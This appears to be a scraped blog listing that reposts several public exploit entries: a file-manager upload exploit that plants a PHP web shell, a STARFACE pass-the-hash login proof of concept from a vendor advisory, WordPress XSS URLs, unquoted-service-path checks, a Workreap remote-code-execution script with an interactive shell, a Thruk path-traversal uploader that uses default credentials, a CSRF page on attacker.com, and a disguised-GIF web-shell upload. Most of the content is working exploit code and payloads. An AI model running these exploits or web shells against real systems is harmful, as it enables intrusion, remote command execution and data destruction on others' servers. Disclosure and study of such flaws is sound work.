"------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n" r = requests.post(url, headers=headers, data=data) print(f"{PROCESS} Sending AJAX request to: {url}") if 'errUploadMime' in r.text: print(f'{FAIL} Exploit failed!') sys.exit() elif r.headers['Content-Type'].startswith("text/html"): print(f'{FAIL} Exploit failed! Try to change _fmakey') sys.exit(0) else: print(f'{SUCCESS} Exploit executed with success!') exploited = json.loads(r.text) url = "" print(f'{PROCESS} Getting URL with webshell') for i in exploited["added"]: url = i['url'] print(f"{PROCESS} Executing '{COMMAND}'") r = requests.get(url+'?cmd='+COMMAND) print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)
  12. HireHackking

    STARFACE 7.3.0.10 - Authentication with Password Hash Possible

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: STARFACE 7.3.0.10 - Authentication with Password Hash Possible Affected Versions: 7.3.0.10 and earlier versions Fixed Versions: - Vulnerability Type: Broken Authentication Security Risk: low Vendor URL: https://www.starface.de Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004 Advisory Status: published CVE: CVE-2023-33243 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243 Introduction ============ "When functionality and comfort come together, the result is a state-of-the-art experience that we've dubbed 'comfortphoning'. It's a secure, scalable digital communication solution that meets every need and wish. STARFACE is easy to integrate into existing IT systems and flexibly grows with your requirements." (from the vendor's homepage) More Details ============ The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from the vendor's homepage [1]. The included files can be further examined by either extracting the contents or running the image in a virtual machine. The web interface of the PBX uses the JavaScript file at the following path to submit the login form: ------------------------------------------------------------------------ js/prettifier.js ------------------------------------------------------------------------ The following two lines of the JavaScript file "prettifier.js" add the two parameters "secret" and "ack" to the form before being submitted: ------------------------------------------------------------------------ $form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk)); $form(document.forms[0]).add('ack', defaultVals.k); ------------------------------------------------------------------------ The JavaScript object "defaultVals" is included in the web application's source text. While the value of "defaultVals.k" was found to be the static hash of the PBX version, the value of "defaultVals.bk" contains a nonce only valid for the currently used session. Therefore, the form parameter "ack" is always the same value. For the form value "secret" the function "createHash()" is called with different arguments. The value of "defaultVals.isAd" is set to "false" when login via Active Directory is disabled. The parameters "liv" and "lpv" contain the username and password entered into the form respectively. ------------------------------------------------------------------------ const createHash = function (isAD, user, pass, nonces) { if (isAD) { return forAD.encode(user + nonces + pass); } return user + ':' + forSF(user + nonces + forSF(pass)); }; ------------------------------------------------------------------------ The expression right after the second return statement is the implementation used when Active Directory login is disabled which is the default setting. The return value is composed of the username separated via a colon from a value built using the "forSF()" function. The "forSF()" function was found to calculate the SHA512 hash value. When considering the arguments passed to the function, the hash is calculated as follows: ------------------------------------------------------------------------ SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password)) ------------------------------------------------------------------------ As can be seen, instead of the cleartext password the SHA512 hash of the password is used in the calculation. In conclusion, for the form value "secret" the following value is transmitted: ------------------------------------------------------------------------ username + ":" + SHA512( username + defaultVals.k + defaultVals.bk + SHA512(password) ) ------------------------------------------------------------------------ If the SHA512 hash of a user's password is known, it can be directly used in the calculation of the "secret" during the login process. Knowledge of the cleartext password is not required. This finding was also verified by analysing the decompiled Java code of the server component. It was also found that the authentication process of the REST API is vulnerable in a very similar manner. Proof of Concept ================ The following Python script can be used to perform a login by specifying a target URL, a username and the associated password hash: ------------------------------------------------------------------------ #!/usr/bin/env python3 import click import hashlib import re import requests import typing def get_values_from_session(url, session) -> typing.Tuple[str, str]: k, bk = "", "" response_content = session.get(f"{url}/jsp/index.jsp").text k_result = re.search("\sk : '([^']+)'", response_content) bk_result = re.search("\sbk : '([^']+)'", response_content) if k_result != None: k = k_result.group(1) if bk_result != None: bk = bk_result.group(1) return k, bk def web_login(url, login, pwhash, session) -> bool: version, nonce = get_values_from_session(url, session) if version == "" or nonce == "": print("Web Login failed: Nonce and version hash can not be retrieved.") return value = login + version + nonce + pwhash secret = hashlib.sha512(value.encode("utf-8")).hexdigest() data = { "forward": "", "autologin": "false", "secret": f"{login}:{secret}", "ack": version, } login_request = session.post( f"{url}/login", data=data, allow_redirects=False, headers={"Referer": f"{url}/jsp/index.jsp"}, ) response_headers = login_request.headers if "Set-Cookie" in response_headers: session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0] print(f"Session ID: {session_id}") return True else: print("Invalid login data") return False def get_nonce_from_api(url, session) -> str: response_content = session.get(f"{url}/rest/login").json() return response_content["nonce"] if "nonce" in response_content else "" def rest_login(url, login, pwhash, session): nonce = get_nonce_from_api(url, session) if nonce == "": print("REST Login failed: Nonce can not be retrieved.") return value = login + nonce + pwhash secret = hashlib.sha512(value.encode("utf-8")).hexdigest() data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"} login_request = session.post( f"{url}/rest/login", json=data, headers={"Content-Type": "application/json", "X-Version": "2"}, ) response_data = login_request.json() token = response_data["token"] if "token" in response_data else "none" print(f"REST API Token: {token}") @click.command() @click.option('--url', help='Target System URL', required=True) @click.option('--login', help='Login ID', required=True) @click.option('--pwhash', help='Password Hash', required=True) def login(url, login, pwhash): session = requests.session() stripped_url = url.rstrip("/") result = web_login(stripped_url, login, pwhash, session) if result: rest_login(stripped_url, login, pwhash, session) if __name__ == "__main__": login() ------------------------------------------------------------------------ For example, the SHA512 hash of the password "starface" can be calculated as follows: ------------------------------------------------------------------------ $ echo -n "starface" | sha512sum a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec - ------------------------------------------------------------------------ The Python script can be run as follows to perform a login as the user "0001" with the aforementioned hash: ------------------------------------------------------------------------ $ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash 'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec' Session ID: 2CF09656E274F000FFAD023AF37629CE REST API Token: 51eef8f8vp3d3u81k0imjbuuu7 ------------------------------------------------------------------------ When the password hash is valid for the specified user of the targeted instance a session ID as well as a REST API token is returned. Afterwards, these values can be used to interact with the web application and the REST API. Workaround ========== None Fix === On 4 May 2023, version 8.0.0.11 was released. In this version the vulnerability was addressed with a temporary solution, such that the password hashes are encrypted before they are saved in the database. This approach prevents attackers from exploiting this vulnerability in scenarios where they have only acquired pure database access. However, attackers with system level access can bypass this temporary measure as they can extract the encryption key and decrypt the hashes in the database. A solution that fixes this vulnerability entirely is still in progress. Security Risk ============= The web interface and REST API of STARFACE allow to login using the password hash instead of the cleartext password. This can be exploited by attackers who gained access to the application's database where the passwords are also saved as a SHA512 hash of the cleartext passwords. While the precondition for this attack could be the full compromise of the STARFACE PBX, another attack scenario could be that attackers acquire access to backups of the database stored on another system. Furthermore, the login via password hash allows attackers for permanent unauthorised access to the web interface even if system access was obtained only temporarily. Due to the prerequisites of obtaining access to password hashes, the vulnerability poses a low risk only. Timeline ======== 2022-12-06 Vulnerability identified 2022-12-13 Customer approved disclosure to vendor 2023-01-11 Vendor notified 2023-05-04 Vendor released new version 8.0.0.11 2023-05-19 CVE ID requested 2023-05-20 CVE ID assigned 2023-06-01 Advisory released References ========== [0] https://starface.com/en/products/comfortphoning/ [1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694 RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
  13. HireHackking

    Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/ # Date: 2023-04-24 # Exploit Author: LEE SE HYOUNG (hackintoanetwork) # Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/ # Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip # Category: Web Application # Version: 1.6.7 # Tested on: Debian / WordPress 6.1.1 # CVE : CVE-2023-30868 # Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve # 1. Technical Description: The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed. # 2. Proof of Concept (PoC): WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS) In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7. 1. CMS Tree Page View Plugin <= 1.6.6 a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E. b. your payload will be executed.

[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts. 2. CMS Tree Page View Plugin <= 1.6.7 a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22. b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows). 
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
  14. HireHackking

    Macro Expert 4.9 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Macro Expert 4.9 - Unquoted Service Path # Date: 04/06/2023 # Exploit Author: Murat DEMIRCI # Vendor Homepage: http://www.macro-expert.com/ # Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe # Version: 4.9 # Tested on: Windows 10 # Proof of Concept : C:\Users\Murat>sc qc "Macro Expert" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Macro Expert TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro expert\MacroService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Macro Expert DEPENDENCIES : SERVICE_START_NAME : LocalSystem # If a malicious payload insert into related path and service is executed in anyway, this can gain new privilege access to the system and perform malicious acts.
  15. HireHackking

    USB Flash Drives Control 4.1.0.0 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: USB Flash Drives Control 4.1.0.0 - Unquoted Service Path # Date: 2023-31-05 # Exploit Author: Jeffrey Bencteux # Vendor Homepage: https://binisoft.org/ # Software Link: https://binisoft.org/wfc # Version: 4.1.0.0 # Tested on: Microsoft Windows 11 Pro # Vulnerability Type: Unquoted Service Path PS C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows" USB Flash Drives Control usbcs C:\Program Files\USB Flash Drives Control\usbcs.exe Auto PS C:\> sc.exe qc usbcs [SC] QueryServiceConfig SUCCESS SERVICE_NAME: usbcs TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\USB Flash Drives Control\usbcs.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : USB Flash Drives Control DEPENDENCIES : SERVICE_START_NAME : LocalSystem PS C:\> systeminfo OS Name: Microsoft Windows 11 Pro OS Version: 10.0.22621 N/A Build 22621 OS Manufacturer: Microsoft Corporation -- Jeffrey BENCTEUX
  16. HireHackking

    WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution # Dork: inurl:/wp-content/themes/workreap/ # Date: 2023-06-01 # Category : Webapps # Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454 # Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l) # Version: 2.2.2 # Tested on: Windows/Linux # CVE: CVE-2021-24499 import requests import random import string import sys def usage(): banner = ''' NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution usage: python3 Workreap_rce.py <URL> example for linux : python3 Workreap_rce.py https://www.exploit-db.com example for Windows : python Workreap_rce.py https://www.exploit-db.com ''' print(f"{BOLD}{banner}{ENDC}") def upload_file(target): print("[ ] Uploading File") url = target + "/wp-admin/admin-ajax.php" body = "<?php echo '" + random_str + "';?>" data = {"action": "workreap_award_temp_file_uploader"} response = requests.post(url, data=data, files={"award_img": (file_name, body)}) if '{"type":"success",' in response.text: print(f"{GREEN}[+] File uploaded successfully{ENDC}") check_php_file(target) else: print(f"{RED}[+] File was not uploaded{ENDC}") def check_php_file(target): response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name) if random_str in response_2.text: print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}") print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name) question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}") if question == "y" or question == "Y": print("[ ] Uploading Shell ") get_rce(target) else: usage() else: print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}") def get_rce(target): file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php" body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>' data = {"action": "workreap_award_temp_file_uploader"} response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)}) print(f"{GREEN}[+] Shell uploaded successfully{ENDC}") while True: command = input(f"{YELLOW}Enter a command to execute: {ENDC}") print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}") response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}") print(f"{GREEN}{response_4.text}{ENDC}") if __name__ == "__main__": global GREEN , RED, YELLOW, BOLD, ENDC GREEN = '\033[92m' RED = '\033[91m' YELLOW = '\033[93m' BOLD = '\033[1m' ENDC = '\033[0m' file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php" random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) try: upload_file(sys.argv[1]) except IndexError: usage() except requests.exceptions.RequestException as e: print("\nPlease Enter Valid Address")
  17. HireHackking

    Thruk Monitoring Web Interface 3.06 - Path Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Thruk Monitoring Web Interface 3.06 - Path Traversal # Date: 08-Jun-2023 # Exploit Author: Galoget Latorre (@galoget) # CVE: CVE-2023-34096 (Galoget Latorre) # Vendor Homepage: https://thruk.org/ # Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip # Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096 # CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html # GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h # Affected Versions: <= 3.06 # Language: Python 3.x # Tested on: # - Ubuntu 22.04.5 LTS 64-bit # - Debian GNU/Linux 10 (buster) 64-bit # - Kali GNU/Linux 2023.1 64-bit # - CentOS GNU/Linux 8.5.2111 64-bit #!/usr/bin/python3 # -*- coding:utf-8 -*- import sys import warnings import requests from bs4 import BeautifulSoup from termcolor import cprint # Usage: python3 exploit.py <target.site> # Example: python3 exploit.py http://127.0.0.1/thruk/ # Disable warnings warnings.filterwarnings('ignore') # Set headers headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" } def banner(): """ Function to print the banner """ banner_text = """ __ __ __ __ __ __ __ __ __ __ / \\ /|_ __ _) / \\ _) _) __ _) |__| / \\ (__\\ /__ \\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__) Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06 Exploit & CVE Author: Galoget Latorre (@galoget) LinkedIn: https://www.linkedin.com/in/galoget """ print(banner_text) def usage_instructions(): """ Function that validates the number of arguments. The application MUST have 2 arguments: - [0]: Name of the script - [1]: Target URL (Thruk Base URL) """ if len(sys.argv) != 2: print("Usage: python3 exploit.py <target.site>") print("Example: python3 exploit.py http://127.0.0.1/thruk/") sys.exit(0) def check_vulnerability(thruk_version): """ Function to check if the recovered version is vulnerable to CVE-2023-34096. Prints additional information about the vulnerability. """ try: if float(thruk_version[1:5]) <= 3.06: if float(thruk_version[4:].replace("-", ".")) < 6.2: cprint("[+] ", "green", attrs=['bold'], end = "") print("This version of Thruk is ", end = "") cprint("VULNERABLE ", "red", attrs=['bold'], end = "") print("to CVE-2023-34096!") print(" | CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html") print(" | GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h") print(" | CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096") print(" | CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096") print(" | Thruk Changelog: https://www.thruk.org/changelog.html") print(" | Fixed version: 3.06-2+") print("") return True else: cprint("[-] ", "red", attrs=['bold'], end = "") print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.") return False except: cprint("[-] ", "red", attrs=['bold'], end = "") print("There was an error parsing Thruk's version.\n") return False def get_thruk_version(): """ Function to get Thruk's version via web scraping. It also verifies the title of the website to check if the target is a Thruk instance. """ response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10) html_soup = BeautifulSoup(response.text, "html.parser") if "<title>Thruk Monitoring Webinterface</title>" not in response.text: cprint("[-] ", "red", attrs=['bold'], end = "") print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.") sys.exit(-1) else: # Extract version anchor tag version_link = html_soup.find_all("a", {"class": "link text-sm"}) if len(version_link) == 1 and version_link[0].has_attr('href'): thruk_version = version_link[0].text.strip() cprint("[+] ", "green", attrs=['bold'], end = "") print(f"Detected Thruk Version (Public Banner): {thruk_version}\n") return thruk_version else: cprint("[-] ", "red", attrs=['bold'], end = "") print("There was an error retrieving Thruk's version.") sys.exit(-1) def get_error_info(): """ Function to cause an error in the target Thruk instance and collect additional information via web scraping. """ # URL that will cause an error error_url = target + "//cgi-bin/login.cgi" # Retrieve Any initial Cookies error_response = requests.get(error_url, headers=headers, allow_redirects=False, verify=False, timeout=10) cprint("[*] ", "blue", attrs=['bold'], end = "") print("Trying to retrieve additional information...\n") try: # Search for the error tag html_soup = BeautifulSoup(error_response.text, "html.parser") error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text if len(error_report) > 0: # Print Error Info error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")] cprint("[+] ", "green", attrs=['bold'], end = "") print("Recovered Information: \n") parsed_error_report = error_report.split("\n") for error_line in parsed_error_report: print(f" {error_line}") except: cprint("[-] ", "red", attrs=['bold'], end = "") print("No additional information available.\n") def get_thruk_session_auto_login(): """ Function to login into the Thruk instance and retrieve a valid session. It will use default Thruk's credentials available here: - https://www.thruk.org/documentation/install.html Change credentials if required. """ # Default Credentials - Change if required username = "thrukadmin" # CHANGE ME password = "thrukadmin" # CHANGE ME params = {"login": username, "password": password} cprint("[*] ", "blue", attrs=['bold'], end = "") print(f"Trying to autenticate with provided credentials: {username}/{password}\n") # Define Login URL login_url = "cgi-bin/login.cgi" session = requests.Session() # Retrieve Any initial Cookies session.get(target, headers=headers, allow_redirects=True, verify=False) # Login and get thruk_auth Cookie session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False) # Get Cookies as dictionary cookies = session.cookies.get_dict() # Successful Login if cookies.get('thruk_auth') is not None: cprint("[+] ", "green", attrs=['bold'], end = "") print("Successful Authentication!\n") cprint("[+] ", "green", attrs=['bold'], end = "") print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n") return session # Failed Login else: if cookies.get('thruk_message') == "fail_message~~login%20failed": cprint("[-] ", "red", attrs=['bold'], end = "") print("Login Failed, check your credentials.") sys.exit(401) def cve_2023_34096_exploit_path_traversal(logged_session): """ Function that attempts to exploit the Path Traversal Vulnerability. The exploit will try to upload a PoC file to multiple common folders. This to prevent permissions errors to cause false negatives. """ cprint("[*] ", "blue", attrs=['bold'], end = "") print("Trying to exploit: ", end = "") cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold']) # Define Upload URL upload_url = "cgi-bin/panorama.cgi" # Absolute paths common_folders = ["/tmp/", "/etc/thruk/plugins/plugins-enabled/", "/etc/thruk/panorama/", "/etc/thruk/bp/", "/etc/thruk/thruk_local.d/", "/var/www/", "/var/www/html/", "/etc/", ] # Upload PoC file to each folder for target_folder in common_folders: # PoC file extension is jpg due to regex validations of Thruk. # Nevertheless this issue can still cause damage in different ways to the affected instance. files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")} data = {"task": "upload", "type": "image", "location": f"backgrounds/../../../..{target_folder}" } upload_response = logged_session.post(target + upload_url, data=data, files=files, headers=headers, allow_redirects=False, verify=False) try: upload_response = upload_response.json() if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True: cprint("[+] ", "green", attrs=['bold'], end = "") print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n") elif upload_response.get("msg") == "Fileupload must use existing and writable folder.": cprint("[-] ", "red", attrs=['bold'], end = "") print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n") else: cprint("[-] ", "red", attrs=['bold'], end = "") print("File upload failed.\n") except: cprint("[-] ", "red", attrs=['bold'], end = "") print("File upload failed.\n") if __name__ == "__main__": banner() usage_instructions() # Change this with the domain or IP address to attack if sys.argv[1] and sys.argv[1].startswith("http"): target = sys.argv[1] else: target = "http://127.0.0.1/thruk/" # Prepare Base Target URL if not target.endswith('/'): target += "/" cprint("[+] ", "green", attrs=['bold'], end = "") print(f"Target URL: {target}\n") # Get Thruk version via web scraping scraped_thruk_version = get_thruk_version() # Send a request that will generate an error and collect extra info get_error_info() # Check if the instance is vulnerable to CVE-2023-34096 vulnerable_status = check_vulnerability(scraped_thruk_version) if vulnerable_status: cprint("[+] ", "green", attrs=['bold'], end = "") print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?") # Confirm exploitation option = input("\nChoice (Y/N): ").lower() print("") if option == "y": cprint("[*] ", "blue", attrs=['bold'], end = "") print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n") # Login into Thruk instance valid_session = get_thruk_session_auto_login() # Exploit Path Traversal Vulnerability cve_2023_34096_exploit_path_traversal(valid_session) elif option == "n": cprint("[*] ", "blue", attrs=['bold'], end = "") print("No exploitation attempts were performed, Goodbye!\n") sys.exit(0) else: cprint("[-] ", "red", attrs=['bold'], end = "") print("Unknown option entered.") sys.exit(1) else: cprint("[-] ", "red", attrs=['bold'], end = "") print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.") sys.exit(2)
  18. HireHackking

    Online Examination System Project 1.0 - Cross-site request forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF) # Google Dork: n/a # Date: 09/06/2023 # Exploit Author: Ramil Mustafayev (kryptohaker) # Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php # Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip # Version: 1.0 # Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28 # CVE : n/a Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data. To exploit this vulnerability, an attacker needs to do the following: 1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/ 2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com 3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example: <html> <body> <form action="http://example.com/update.php" method="GET"> <input type="hidden" name="demail" value="victim@example.com" /> </form> <script> document.forms[0].submit(); </script> </body> </html> 4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html 5. Send the URL of the HTML page to the admin user via email, social media, or any other means. If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.
  19. HireHackking

    Teachers Record Management System 1.0 - File Upload Type Validation

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation Date: 17-01-2023 EXPLOIT-AUTHOR: AFFAN AHMED Vendor Homepage: <https://phpgurukul.com> Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/> Version: 1.0 Tested on: Windows 11 + XAMPP CVE : CVE-2023-3187 =============================== STEPS_TO_REPRODUCE =============================== 1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com” Password: Test@123” 2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image 3. Open the Burp-suite and Intercept the Edit Image Request 4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ” 5. Change the **Content-type from “ image/png “ to “ image/gif “ 6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>` 7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension** 8. Below is the Burpsuite-POST Request for all the changes that I have made above ========================================== BURPSUITE_REQUEST ========================================== POST /trms/teacher/changeimage.php HTTP/1.1 Host: localhost Content-Length: 442 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: <http://localhost> Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: <http://localhost/trms/teacher/changeimage.php> Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc Connection: close ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="subjects" John Doe ------WebKitFormBoundaryndAPYa0GGOxSUHdF 